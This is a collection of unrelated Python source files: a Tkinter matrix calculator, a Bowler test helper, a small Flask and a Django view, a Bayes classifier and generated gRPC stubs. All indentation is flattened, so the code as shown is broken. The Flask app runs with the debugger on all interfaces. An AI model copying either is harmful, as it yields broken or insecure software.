BackBtn.image = Back
BackBtn.place(x=-2, y=-2)
Info = PhotoImage(file="DisneyInfoButton.png")
InfoBtn = Button(self, image=Info, bd=0, bg='black', command=lambda: InfoAct())
InfoBtn.image = Info
InfoBtn.place(x=-2, y=698)
Music = PhotoImage(file="DisneyMusicOn.png")
MusicBtn = Button(self, image=Music, bd=0, bg='black', command=lambda: MuteAct())
MusicBtn.image = Music
MusicBtn.place(x=48, y=698)
MusicOff = PhotoImage(file="DisneyMusicOff.png")
MuteOff = Button(self, image=MusicOff, bd=0, bg='black', command=lambda: MuteAct())
MuteOff.image = MusicOff
MuteOff.place(x=48, y=698)
MuteOff.lower()
Random = PhotoImage(file="DisneyRandomButton.png")
RandBtn = Button(self, image=Random, bd=0, bg="black", command=lambda: RandAct())
RandBtn.image = Random
RandBtn.place(x=98, y=698)
Reset = PhotoImage(file="DisneyClearButton.png")
ResetBtn = Button(self, image=Reset, bd=0, bg="black", command=lambda: ResetAct())
ResetBtn.image = Reset
ResetBtn.place(x=148, y=698)
Dtm = PhotoImage(file="Button1.png")
DtmBtn = Button(self, image=Dtm, bd=0, command=lambda: DtmAct())
DtmBtn.image = Dtm
DtmBtn.place(x=48, y=174)
Inverse = PhotoImage(file="Button2.png")
InverseBtn = Button(self, image=Inverse, bd=0, command=lambda: InvAct())
InverseBtn.image = Inverse
InverseBtn.place(x=48, y=282)
Trans = PhotoImage(file="Button3.png")
TransBtn = Button(self, image=Trans, bd=0, command=lambda: TrpAct())
TransBtn.image = Trans
TransBtn.place(x=48, y=390)
Scal = PhotoImage(file="Button4.png")
ScalBtn = Button(self, image=Scal, bd=0, command=lambda: ScaAct())
ScalBtn.image = Scal
ScalBtn.place(x=48, y=498)
Multi = PhotoImage(file="Button5.png")
MultiBtn = Button(self, image=Multi, bd=0, command=lambda: MulAct())
MultiBtn.image = Multi
MultiBtn.place(x=48, y=606)
Triangle = PhotoImage(file="Button6.png")
TriangleBtn = Button(self, image=Triangle, bd=0, command=lambda: TriAct())
TriangleBtn.image = Triangle
TriangleBtn.place(x=281, y=174)
Trac = PhotoImage(file="Button7.png")
TraceBtn = Button(self, image=Trac, bd=0, command=lambda: TrcAct())
TraceBtn.image = Trac
TraceBtn.place(x=281, y=282)
LUdec = PhotoImage(file="Button8.png")
LUdecBtn = Button(self, image=LUdec, bd=0, command=lambda: LUDAct())
LUdecBtn.image = LUdec
LUdecBtn.place(x=281, y=390)
Rank = PhotoImage(file="Button9.png")
RankBtn = Button(self, image=Rank, bd=0, command=lambda: RanAct())
RankBtn.image = Rank
RankBtn.place(x=281, y=498)
Pwr = PhotoImage(file="Button10.png")
PwrBtn = Button(self, image=Pwr, bd=0, command=lambda: PowAct())
PwrBtn.image = Pwr
PwrBtn.place(x=281, y=606)
TwoMatrix = PhotoImage(file="twoD.png")
TwoMatrixBtn = Button(self, image=TwoMatrix, bd=0, command=lambda: EntLIFT2())
TwoMatrixBtn.image = TwoMatrix
TwoMatrixBtn.place(x=514, y=403)
ThreeMatrix = PhotoImage(file="threeD.png")
ThreeMatrixBtn = Button(self, image=ThreeMatrix, bd=0, command=lambda: EntLIFT3())
ThreeMatrixBtn.image = ThreeMatrix
ThreeMatrixBtn.place(x=634, y=403)
FourMatrix = PhotoImage(file="fourD.png")
FourMatrixBtn = Button(self, image=FourMatrix, bd=0, command=lambda: EntLIFT4())
FourMatrixBtn.image = FourMatrix
FourMatrixBtn.place(x=754, y=403)
def validate(string):
regex = re.compile(r"(\+|\-)?[0-9.]*$")
result = regex.match(string)
return (string == ""
or (string.count('+') <= 1
and string.count('-') <= 1
and string.count('.') <= 1
and result is not None
and result.group(0) != ""))
def on_validate(P):
return validate(P)
M1aEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M1aEnt.config(validatecommand=(M1aEnt.register(on_validate), '%P'))
M1aEnt.place(x=529, y=61, width=50, height=50)
M1bEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M1bEnt.config(validatecommand=(M1bEnt.register(on_validate), '%P'))
M1bEnt.place(x=609, y=61, width=50, height=50)
M1cEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M1cEnt.config(validatecommand=(M1cEnt.register(on_validate), '%P'))
M1cEnt.place(x=689, y=61, width=50, height=50)
M1dEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M1dEnt.config(validatecommand=(M1dEnt.register(on_validate), '%P'))
M1dEnt.place(x=769, y=61, width=50, height=50)
M2aEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M2aEnt.config(validatecommand=(M2aEnt.register(on_validate), '%P'))
M2aEnt.place(x=529, y=146, width=50, height=50)
M2bEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M2bEnt.config(validatecommand=(M2bEnt.register(on_validate), '%P'))
M2bEnt.place(x=609, y=146, width=50, height=50)
M2cEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M2cEnt.config(validatecommand=(M2cEnt.register(on_validate), '%P'))
M2cEnt.place(x=689, y=146, width=50, height=50)
M2dEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M2dEnt.config(validatecommand=(M2dEnt.register(on_validate), '%P'))
M2dEnt.place(x=769, y=146, width=50, height=50)
M3aEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M3aEnt.config(validatecommand=(M3aEnt.register(on_validate), '%P'))
M3aEnt.place(x=529, y=231, width=50, height=50)
M3bEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M3bEnt.config(validatecommand=(M3bEnt.register(on_validate), '%P'))
M3bEnt.place(x=609, y=231, width=50, height=50)
M3cEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M3cEnt.config(validatecommand=(M3cEnt.register(on_validate), '%P'))
M3cEnt.place(x=689, y=231, width=50, height=50)
M3dEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M3dEnt.config(validatecommand=(M3dEnt.register(on_validate), '%P'))
M3dEnt.place(x=769, y=231, width=50, height=50)
M4aEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M4aEnt.config(validatecommand=(M4aEnt.register(on_validate), '%P'))
M4aEnt.place(x=529, y=316, width=50, height=50)
M4bEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M4bEnt.config(validatecommand=(M4bEnt.register(on_validate), '%P'))
M4bEnt.place(x=609, y=316, width=50, height=50)
M4cEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M4cEnt.config(validatecommand=(M4cEnt.register(on_validate), '%P'))
M4cEnt.place(x=689, y=316, width=50, height=50)
M4dEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M4dEnt.config(validatecommand=(M4dEnt.register(on_validate), '%P'))
M4dEnt.place(x=769, y=316, width=50, height=50)
MultiEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center",validate="key")
MultiEnt.config(validatecommand=(MultiEnt.register(on_validate), '%P'))
MultiEnt.place(x=176, y=611, width=50, height=50)
PowEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center",validate="key")
PowEnt.config(validatecommand=(PowEnt.register(on_validate), '%P'))
PowEnt.place(x=411, y=611, width=50, height=50)
Result = Label(self, bg='#016738', fg='white', anchor='w', justify="left")
Result.place(x=898, y=50, width=344, height=685)
Result1 = Label(self, bg='#016738', fg='white', anchor='w', justify="right")
Result1.place(x=898, y=50, width=172, height=685)
Result2 = Label(self, bg='#016738', fg='white', anchor='w', justify="left")
Result2.place(x=1070, y=50, width=172, height=685)
def EntLOWER():
Ent = (M1aEnt, M1bEnt, M1cEnt, M1dEnt, M2aEnt, M2bEnt, M2cEnt, M2dEnt, M3aEnt, M3bEnt, M3cEnt, M3dEnt, M4aEnt, M4bEnt, M4cEnt, M4dEnt)
for i in range (16):
Ent[i].lower()
EntLOWER()
def EntLIFT4():
SMPage.DIM = 4
EntLOWER()
Ent = (M1aEnt, M1bEnt, M1cEnt, M1dEnt, M2aEnt, M2bEnt, M2cEnt, M2dEnt, M3aEnt, M3bEnt, M3cEnt, M3dEnt, M4aEnt,M4bEnt, M4cEnt, M4dEnt)
for i in range(16):
Ent[i].lift()
def EntLIFT3():
SMPage.DIM = 3
EntLOWER()
Ent = (M1aEnt, M1bEnt, M1cEnt, M2aEnt, M2bEnt, M2cEnt, M3aEnt, M3bEnt, M3cEnt)
for i in range(9):
Ent[i].lift()
def EntLIFT2():
SMPage.DIM = 2
EntLOWER()
Ent = (M2bEnt, M2cEnt, M3bEnt, M3cEnt)
for i in range(4):
Ent[i].lift()
def SM():
if SMPage.DIM==2:
if not FTest(M2bEnt.get()) or not FTest(M2cEnt.get()) or not FTest(M3bEnt.get()) or not FTest(M3cEnt.get()):
SMat = SingleMatrix(0, 0)
else:
Mat2D = (float(M2bEnt.get()),float(M2cEnt.get()),float(M3bEnt.get()), float(M3cEnt.get()))
SMat = SingleMatrix(Mat2D, SMPage.DIM)
elif SMPage.DIM==3:
if not FTest(M1aEnt.get()) or not FTest(M1bEnt.get()) or not FTest(M1cEnt.get()) or not FTest(M2aEnt.get()) or not FTest(M2bEnt.get()) or not FTest(M2cEnt.get())\
or not FTest(M3aEnt.get()) or not FTest(M3bEnt.get()) or not FTest(M3cEnt.get()):
SMat = SingleMatrix(0, 0)
else:
Mat3D = (float(M1aEnt.get()), float(M1bEnt.get()), float(M1cEnt.get()), float(M2aEnt.get()), float(M2bEnt.get()),float(M2cEnt.get()), float(M3aEnt.get()), float(M3bEnt.get()), float(M3cEnt.get()))
SMat = SingleMatrix(Mat3D, SMPage.DIM)
elif SMPage.DIM==4:
if not FTest(M1aEnt.get()) or not FTest(M1bEnt.get()) or not FTest(M1cEnt.get()) or not FTest(M1dEnt.get()) or not FTest(M2aEnt.get()) or not FTest(M2bEnt.get()) or not FTest(M2cEnt.get()) or not FTest(M2dEnt.get())\
or not FTest(M3aEnt.get()) or not FTest(M3bEnt.get()) or not FTest(M3cEnt.get()) or not FTest(M3dEnt.get()) or not FTest(M4aEnt.get()) or not FTest(M4bEnt.get()) or not FTest(M4cEnt.get()) or not FTest(M4dEnt.get()):
SMat = SingleMatrix(0, 0)
else:
Mat4D = (float(M1aEnt.get()), float(M1bEnt.get()), float(M1cEnt.get()), float(M1dEnt.get()), float(M2aEnt.get()), float(M2bEnt.get()), float(M2cEnt.get()), float(M2dEnt.get()),
float(M3aEnt.get()), float(M3bEnt.get()), float(M3cEnt.get()), float(M3dEnt.get()), float(M4aEnt.get()), float(M4bEnt.get()), float(M4cEnt.get()), float(M4dEnt.get()))
SMat = SingleMatrix(Mat4D, SMPage.DIM)
else:
SMat = SingleMatrix(0, 0)
return SMat
def FTest(x):
return x.lstrip('-').lstrip('+').replace('.', '', 1).isdigit()
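# FTest accepts strings such as "3", "-2.5" or "+0.1" and rejects "", "abc" and "1.2.3";
# it is only a lightweight guard before the float() conversions used above.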
def Avalue():
if FTest(MultiEnt.get()):
value = float(MultiEnt.get())
else:
value = 1
return value
def Bvalue():
if FTest(PowEnt.get()):
value = float(PowEnt.get())
else:
value = 1
return value
def SME():
if SMPage.DIM==2:
if not FTest(M2bEnt.get()) or not FTest(M2cEnt.get()) or not FTest(M3bEnt.get()) or not FTest(M3cEnt.get()):
SMat = DoubleMatrix(0,0,0,0,0)
else:
Mat2D = (float(M2bEnt.get()),float(M2cEnt.get()),float(M3bEnt.get()), float(M3cEnt.get()))
SMat = DoubleMatrix(Mat2D,0,SMPage.DIM,Avalue(),Bvalue())
elif SMPage.DIM==3:
if not FTest(M1aEnt.get()) or not FTest(M1bEnt.get()) or not FTest(M1cEnt.get()) or not FTest(M2aEnt.get()) or not FTest(M2bEnt.get()) or not FTest(M2cEnt.get())\
or not FTest(M3aEnt.get()) or not FTest(M3bEnt.get()) or not FTest(M3cEnt.get()):
SMat = DoubleMatrix(0,0,0,0,0)
else:
Mat3D = (float(M1aEnt.get()), float(M1bEnt.get()), float(M1cEnt.get()), float(M2aEnt.get()), float(M2bEnt.get()),float(M2cEnt.get()), float(M3aEnt.get()), float(M3bEnt.get()), float(M3cEnt.get()))
SMat = DoubleMatrix(Mat3D,0,SMPage.DIM,Avalue(),Bvalue())
elif SMPage.DIM==4:
if not FTest(M1aEnt.get()) or not FTest(M1bEnt.get()) or not FTest(M1cEnt.get()) or not FTest(M1dEnt.get()) or not FTest(M2aEnt.get()) or not FTest(M2bEnt.get()) or not FTest(M2cEnt.get()) or not FTest(M2dEnt.get())\
or not FTest(M3aEnt.get()) or not FTest(M3bEnt.get()) or not FTest(M3cEnt.get()) or not FTest(M3dEnt.get()) or not FTest(M4aEnt.get()) or not FTest(M4bEnt.get()) or not FTest(M4cEnt.get()) or not FTest(M4dEnt.get()):
SMat = DoubleMatrix(0,0,0,0,0)
else:
Mat4D = (float(M1aEnt.get()), float(M1bEnt.get()), float(M1cEnt.get()), float(M1dEnt.get()), float(M2aEnt.get()), float(M2bEnt.get()), float(M2cEnt.get()), float(M2dEnt.get()),
float(M3aEnt.get()), float(M3bEnt.get()), float(M3cEnt.get()), float(M3dEnt.get()), float(M4aEnt.get()), float(M4bEnt.get()), float(M4cEnt.get()), float(M4dEnt.get()),)
SMat = DoubleMatrix(Mat4D,0,SMPage.DIM,Avalue(),Bvalue())
else:
SMat = DoubleMatrix(0,0,0,0,0)
return SMat
def RESULTlift():
Result.lift()
Result.update()
def DtmAct():
Result.configure(font=("PragmataPro", 14), anchor='n', text=SM().Determinant())
RESULTlift()
def InvAct():
Result1.lift()
Result2.lift()
Result1.configure(font=("Lucida Console", 8), anchor='ne', text=SM().Inverse())
Result1.update()
Result2.configure(font=("Lucida Console", 8), anchor='nw', text=SM().InverseRight())
Result2.update()
def TrpAct():
Result.configure(font=("Lucida Console", 20), anchor='n', text=SM().Transpose())
RESULTlift()
def ScaAct():
Result.configure(font=("Menlo", 17), anchor='n', text=SM().Scalar())
RESULTlift()
def MulAct():
Result.configure(font=("PragmataPro", 18), anchor='n', text=SME().MultiplyBy())
RESULTlift()
def TriAct():
Result.configure(font=("Menlo", 15), anchor='n', text=SM().Triangular())
RESULTlift()
def TrcAct():
Result.configure(font=("Lucida Console", 16), anchor='n', text=SM().Trace())
RESULTlift()
def LUDAct():
Result.configure(font=("Menlo", 15), anchor='n', text=SM().LUDec())
RESULTlift()
def RanAct():
Result.configure(font=("PragmataPro", 15), anchor='n', text=SM().Rank())
RESULTlift()
def PowAct():
Result.configure(font=("PragmataPro", 11), anchor='n', text=SME().PowerBy())
RESULTlift()
def BackAct():
BackS = pygame.mixer.Sound("DisneyBack.wav")
BackS.play()
pygame.mixer.music.load("MenuBG.ogg")
pygame.mixer.music.play(-1)
controller.show_frame("MatrixPage")
def InfoAct():
if SMPage.INFO == False:
SMPage.INFO = True
if SMPage.MUTE == False:
InfoS = pygame.mixer.Sound("DisneyInfoButton.wav")
InfoS.play()
InfoPop.lift()
InfoBtn.lift()
else:
SMPage.INFO = False
InfoPop.lower()
def ResetAct():
if SMPage.MUTE == False:
ClearS = pygame.mixer.Sound("DisneyReset.wav")
ClearS.play()
time.sleep(1)
Ent = (M1aEnt, M1bEnt, M1cEnt, M1dEnt, M2aEnt, M2bEnt, M2cEnt, M2dEnt, M3aEnt, M3bEnt, M3cEnt, M3dEnt, M4aEnt, M4bEnt, M4cEnt, M4dEnt)
for i in range(16):
Ent[i].delete(0, END)
Ent[i].lower()
def MuteAct():
if SMPage.MUTE == True:
SMPage.MUTE = False
pygame.mixer.music.load("MickeyMouse.ogg")
pygame.mixer.music.play(-1)
MuteOff.lower()
else:
SMPage.MUTE = True
pygame.mixer.music.stop()
MuteOff.lift()
def RandAct():
if SMPage.MUTE == False:
RandomS = pygame.mixer.Sound("DisneyRandom.wav")
RandomS.play()
runRandAct()
def runRandAct():
time.sleep(2)
Ent = (M1aEnt, M1bEnt, M1cEnt, M1dEnt, M2aEnt, M2bEnt, M2cEnt, M2dEnt, M3aEnt, M3bEnt, M3cEnt, M3dEnt, M4aEnt,M4bEnt, M4cEnt, M4dEnt)
if SMPage.DIM==2:
for i in range(5,7):
Ent[i].delete(0, END)
Ent[i].insert(1, random.randrange(-9, 10))
for i in range(9, 11):
Ent[i].delete(0, END)
Ent[i].insert(1, random.randrange(-9, 10))
elif SMPage.DIM==3:
for i in range(0,3):
Ent[i].delete(0, END)
Ent[i].insert(1, random.randrange(-9, 10))
for i in range(4, 7):
Ent[i].delete(0, END)
Ent[i].insert(1, random.randrange(-9, 10))
for i in range(8, 11):
Ent[i].delete(0, END)
Ent[i].insert(1, random.randrange(-9, 10))
elif SMPage.DIM==4:
for i in range(16):
Ent[i].delete(0, END)
Ent[i].insert(1, random.randrange(-9, 10))
else:
SMPage.DIM=0
|
python
|
#!/usr/bin/env python3
#
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import functools
import multiprocessing
import sys
import unittest
from io import StringIO
import click
import tempfile
from fissix import pygram, pytree
from fissix.pgen2.driver import Driver
from bowler import Query
from bowler.types import LN, SYMBOL, TOKEN
class BowlerTestCase(unittest.TestCase):
"""Subclass of TestCase that captures stdout and makes it easier to run Bowler."""
def setUp(self):
self.buffer = StringIO()
# Replace the write method rather than swapping out sys.stdout itself, so that
# loggers already holding a reference to stdout end up writing here too.
sys.stdout._saved_write = sys.stdout.write
sys.stdout.write = self.buffer.write
sys.stdout._saved_isatty = sys.stdout.isatty
sys.stdout.isatty = lambda: False
def tearDown(self):
if hasattr(sys.stdout, "_saved_write"):
sys.stdout.write = sys.stdout._saved_write
del sys.stdout._saved_write
if hasattr(sys.stdout, "_saved_isatty"):
sys.stdout.isatty = sys.stdout._saved_isatty
del sys.stdout._saved_isatty
def _formatMessage(self, msg1, msg2):
stdout_text = self.buffer.getvalue()
msg = msg1 or msg2
if stdout_text:
msg += "\n"
msg += "-" * 20 + "< captured stdout >" + "-" * 20 + "\n"
msg += stdout_text + "\n"
msg += "-" * 20 + "< end stdout >" + "-" * 20 + "\n"
return msg
def run_bowler_modifier(
self,
input_text,
selector=None,
modifier=None,
selector_func=None,
modifier_func=None,
in_process=True,
query_func=None,
):
"""Returns the modified text."""
if not (selector or selector_func or query_func):
raise ValueError("Pass selector")
if not (modifier or modifier_func or query_func):
raise ValueError("Pass modifier")
exception_queue = multiprocessing.Queue()
def store_exceptions_on(func):
@functools.wraps(func)
def inner(node, capture, filename):
# When in_process=False, this runs in another process. See notes below.
try:
return func(node, capture, filename)
except Exception as e:
exception_queue.put(e)
return inner
def default_query_func(files):
if selector_func:
q = selector_func(files)
else:
q = Query(files).select(selector)
if modifier_func:
q = modifier_func(q)
else:
q = q.modify(modifier)
return q
if query_func is None:
query_func = default_query_func
with tempfile.NamedTemporaryFile(mode="w", suffix=".py", delete=False) as f:
# TODO: I'm almost certain this will not work on Windows, since
# NamedTemporaryFile has it already open for writing. Consider
# using mktemp directly?
f.write(input_text + "\n")
f.close()
query = query_func([f.name])
assert query is not None, "Remember to return the Query"
assert query.retcode is None, "Return before calling .execute"
assert len(query.transforms) == 1, "TODO: Support multiple"
for i in range(len(query.current.callbacks)):
query.current.callbacks[i] = store_exceptions_on(
query.current.callbacks[i]
)
# We require the in_process parameter in order to record coverage properly,
# but it also helps in bubbling exceptions and letting tests read state set
# by modifiers.
query.execute(
interactive=False, write=True, silent=False, in_process=in_process
)
# In the case of in_process=False (mirroring normal use of the tool) we use
# the queue to ship back exceptions from local_process, which can actually
# fail the test. Normally exceptions in modifiers are not printed
# at all unless you pass --debug, and even then you don't get the
# traceback.
# See https://github.com/facebookincubator/Bowler/issues/63
if not exception_queue.empty():
raise AssertionError from exception_queue.get()
with open(f.name, "r") as fr:
return fr.read().rstrip()
def run_bowler_modifiers(
self, cases, selector=None, modifier=None, query_func=None
):
for input, expected in cases:
with self.subTest(input):
output = self.run_bowler_modifier(
input, selector, modifier, query_func=query_func
)
self.assertMultiLineEqual(expected, output)
def parse_line(self, source: str) -> LN:
grammar = pygram.python_grammar_no_print_statement
driver = Driver(grammar, convert=pytree.convert)
# Skip file_input, simple_stmt
return driver.parse_string(source + "\n").children[0].children[0]
class BowlerTestCaseTest(BowlerTestCase):
def test_stdout_capture(self):
print("hi")
print("there")
self.assertIn("hi\n", self.buffer.getvalue())
def test_stdout_click_no_colors(self):
# This tests that we patched isatty correctly.
click.echo(click.style("hi", fg="red", bold=True))
self.assertEqual("hi\n", self.buffer.getvalue())
def test_run_bowler_modifier(self):
input = "x=a*b"
selector = "term< any op='*' any >"
def modifier(node, capture, filename):
capture["op"].value = "/"
capture["op"].changed()
output = self.run_bowler_modifier(input, selector, modifier)
self.assertEqual("x=a/b", output)
def test_run_bowler_modifier_parse_error(self):
input = " if x:\n bad"
selector = "any"
output = self.run_bowler_modifier(input, selector, lambda *args: None)
self.assertFalse("None" in output)
def test_run_bowler_modifier_query_func(self):
input = "x=a*b"
selector = "term< any op='*' any >"
def modifier(node, capture, filename):
capture["op"].value = "/"
capture["op"].changed()
def query_func(arg):
return Query(arg).select(selector).modify(modifier)
output = self.run_bowler_modifier(input, query_func=query_func)
self.assertEqual("x=a/b", output)
def test_run_bowler_modifier_modifier_func(self):
input = "x=a*b"
selector = "term< any op='*' any >"
def selector_func(arg):
return Query(arg).select(selector)
def modifier(node, capture, filename):
capture["op"].value = "/"
capture["op"].changed()
def modifier_func(q):
return q.modify(modifier)
output = self.run_bowler_modifier(
input, selector_func=selector_func, modifier_func=modifier_func
)
self.assertEqual("x=a/b", output)
def test_run_bowler_modifier_ferries_exception(self):
input = "x=a*b"
selector = "term< any op='*' any >"
def modifier(not_enough_args):
pass
# Should work in both modes
self.assertRaises(
AssertionError,
lambda: self.run_bowler_modifier(
input, selector, modifier, in_process=False
),
)
self.assertRaises(
AssertionError,
lambda: self.run_bowler_modifier(
input, selector, modifier, in_process=True
),
)
def test_parse_line_leaf(self):
input = "2.5"
tree = self.parse_line(input)
self.assertEqual(TOKEN.NUMBER, tree.type)
self.assertEqual("2.5", tree.value)
def test_parse_line_node(self):
input = "x = (y+1)"
tree = self.parse_line(input)
self.assertEqual(SYMBOL.expr_stmt, tree.type)
self.assertEqual(TOKEN.NAME, tree.children[0].type)
self.assertEqual(TOKEN.EQUAL, tree.children[1].type)
self.assertEqual(SYMBOL.atom, tree.children[2].type)
self.assertEqual("x", tree.children[0].value)
|
python
|
import random
import json
import requests
from flask import Flask, request, render_template
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def home():
rcomb = request.args.get('rcomb','http://appcombiner:5003/rcomb')
return render_template('index.html', rcomb=str(rcomb))
if __name__=='__main__':
app.run(host='0.0.0.0', port=5000, debug=True)
|
python
|
from django.urls import reverse
from django.views import generic
from . import forms
class KindeditorFormView(generic.FormView):
form_class = forms.KindeditorForm
template_name = "form.html"
def get_success_url(self):
return reverse("kindeditor-form")
kindeditor_form_view = KindeditorFormView.as_view()
|
python
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2003 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from __future__ import absolute_import
from builtins import str
from .Property import Property
class String(Property):
def __init__(
self, name, default="", public=None, validator=None, tip="", doc=""
):
super(String, self).__init__(
name, default, public, validator, tip, doc
)
self.type = "str"
return
def _cast(self, value):
return str(value)
# version
__id__ = "$Id$"
# End of file
|
python
|
from pathlib import Path
from typing import List
def get_asset(name: str) -> Path:
try:
path = next(Path(__file__).parent.rglob(name))
except StopIteration:
raise FileNotFoundError(name)
return path
def find_asset(name: str) -> List[Path]:
paths = list(Path(__file__).parent.rglob(name))
if not paths:
raise FileNotFoundError(name)
return paths
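# Usage sketch (hypothetical file names, for illustration only): get_asset("logo.png")
# returns the first match found under this package directory, while find_asset("*.qml")
# returns every match; both raise FileNotFoundError when nothing matches.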
|
python
|
import pandas as pd
import numpy as np
from scipy.stats import multivariate_normal
from sklearn.metrics import accuracy_score
def bayesiano(classes,x_train,y_train,x_test,y_test):
#### Performs the classification ####
# Matrix that stores the per-class probabilities for each test observation
P = pd.DataFrame(data=np.zeros((x_test.shape[0], len(classes))), columns=classes)
Pc = np.zeros(len(classes))  # Stores the fraction of elements in each class
for i in np.arange(0, len(classes)):  # For each class
elements = tuple(np.where(y_train == classes[i]))  # elements in class i
Pc[i] = len(elements[0])/len(y_train)  # Prior probability of belonging to class i
Z = x_train[elements,:][0]  # Elements of this class in the training set
m = np.mean(Z, axis = 0)  # Mean vector
cv = np.cov(np.transpose(Z))  # Covariance matrix
for j in np.arange(0,x_test.shape[0]):  # for each observation in the test set
x = x_test[j,:]
# compute the probability of belonging to each class
pj = multivariate_normal.pdf(x, mean=m, cov=cv, allow_singular=True)
P[classes[i]][j] = pj*Pc[i]
y_pred = []  # Vector with the predicted classes
for i in np.arange(0, x_test.shape[0]):
c = np.argmax(np.array(P.iloc[[i]]))
y_pred.append(classes[c])
#y_pred = np.array(y_pred, dtype=str)
# compute the accuracy
#score = accuracy_score(y_pred, y_test)
return y_test,y_pred
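# Minimal usage sketch (an assumption for illustration; scikit-learn's iris dataset is not a
# dependency of this module): classify a 70/30 split and report accuracy.
# from sklearn.datasets import load_iris
# from sklearn.model_selection import train_test_split
# iris = load_iris()
# x_tr, x_te, y_tr, y_te = train_test_split(iris.data, iris.target, test_size=0.3, random_state=0)
# y_true, y_hat = bayesiano(np.unique(y_tr), x_tr, y_tr, x_te, y_te)
# print("accuracy:", accuracy_score(y_true, y_hat))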
|
python
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v3.proto.resources import bidding_strategy_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_resources_dot_bidding__strategy__pb2
from google.ads.google_ads.v3.proto.services import bidding_strategy_service_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2
class BiddingStrategyServiceStub(object):
"""Proto file describing the Bidding Strategy service.
Service to manage bidding strategies.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetBiddingStrategy = channel.unary_unary(
'/google.ads.googleads.v3.services.BiddingStrategyService/GetBiddingStrategy',
request_serializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2.GetBiddingStrategyRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_resources_dot_bidding__strategy__pb2.BiddingStrategy.FromString,
)
self.MutateBiddingStrategies = channel.unary_unary(
'/google.ads.googleads.v3.services.BiddingStrategyService/MutateBiddingStrategies',
request_serializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2.MutateBiddingStrategiesRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2.MutateBiddingStrategiesResponse.FromString,
)
class BiddingStrategyServiceServicer(object):
"""Proto file describing the Bidding Strategy service.
Service to manage bidding strategies.
"""
def GetBiddingStrategy(self, request, context):
"""Returns the requested bidding strategy in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateBiddingStrategies(self, request, context):
"""Creates, updates, or removes bidding strategies. Operation statuses are
returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_BiddingStrategyServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetBiddingStrategy': grpc.unary_unary_rpc_method_handler(
servicer.GetBiddingStrategy,
request_deserializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2.GetBiddingStrategyRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_resources_dot_bidding__strategy__pb2.BiddingStrategy.SerializeToString,
),
'MutateBiddingStrategies': grpc.unary_unary_rpc_method_handler(
servicer.MutateBiddingStrategies,
request_deserializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2.MutateBiddingStrategiesRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2.MutateBiddingStrategiesResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v3.services.BiddingStrategyService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
|
python
|
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=
r"""
This file contains the QANet model and all the layers it uses.
"""
